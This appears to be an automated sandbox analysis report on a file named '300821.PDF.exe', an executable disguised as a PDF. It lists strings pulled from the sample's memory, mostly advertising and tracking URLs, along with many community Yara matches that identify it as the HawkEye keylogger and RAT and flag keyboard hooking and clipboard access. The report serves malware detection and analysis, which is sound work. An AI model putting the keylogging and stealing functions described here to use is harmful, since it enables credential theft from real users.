                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: vbc.exe, 00000008.00000003.691925057.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: https://172.217.23.78/
                      Source: vbc.exe, 00000008.00000003.690799803.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNRfxSclVePPTskt_ULwutuxovZBENP6CQBK41sqxH
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNSN_Te_GQT33AAAR6UNrVcn3a-PGny50bSNsHlzoT
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNRxRJyZzZp4KXfYTC7Z4q4fsi2jmRa8YGEqdB288n
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNTzML9SvDOPLAOFxwn751k-3cAoAULy2FWuSRb89C_P
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/ui
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframes
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
                      Source: vbc.exe, 00000008.00000003.690799803.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                      Source: vbc.exe, 00000008.00000003.691419672.00000000027C5000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&cr
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/286x175/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/286x175/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/300x300/2/41/100/83/b5cbfa68-1c93-41c9-8797-4f9b532bc0b6.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQE7dARJDf70CVtvXguPcFi4kAoAFTTEX3FZ_Kd&s=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQEZeIjizh9n8teY_8BOjsYtpLHwSdIq3PT-WQtot4&s=10
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQFso5PEv3c0kRR2gODJUq62DZF6fnxNsqKUTBX-00QeuCR
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQJBttAzO3yKFNSKzEm8qyQoBw2vbSHn0xMB0yhbgc&s=10
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSkA3BhTLNTXreS8GxkTmsFGydHUKxWR3gtSn5&s=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQYaLHOGeTAvxcl2Kvu_RGdrblf1tOpndi7m5_OMgFvfzlI
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQc9-XcC69nXJpriIbLos4bSDdjrz_nByi2zL9xxJ4&s=10
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQcijPNIB_ZGSU0DrjPI_tJ1YOI-6PHUbyHUjTLi3M5nnkK
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQehqYcvOrRcw1YORGnrCzHbNyjMegefhpqYrPQO8G2_KPc
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQyeaAiOCtrhzoyiUuHOZcp67UWv4aYiYIKZ629tWqIyQ_l
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6qDJUCBqqO8k81oIRUuLKwKNP-ux5oIGn1btf&s=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRXMqY1lU5NXqI7H2QRWgHFAYTsfVdew3_6QMhtv0g&s=10
Source: unknown | DNS traffic detected: queries for: 240.163.3.0.in-addr.arpa

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger
Source: Yara match | File source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 300821.PDF.exe PID: 2848, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)
Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs | .Net Code: HookKeyboard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0040D674 OpenClipboard,GetLastError,DeleteFileW,

System Summary:

Malicious sample detected (through community Yara rule)
Source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: 300821.PDF.exe
Source: 300821.PDF.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.300821.PDF.exe.2b9f140.5.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 0_2_014BC774
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 0_2_014BEBC8
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 0_2_014BEBD0
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 5_2_0100B29C
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 5_2_0100C310
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 5_2_0100B290
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 5_2_010099D0
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 5_2_0100DFD4
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 5_2_078BEEC8
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 5_2_078BBDB0
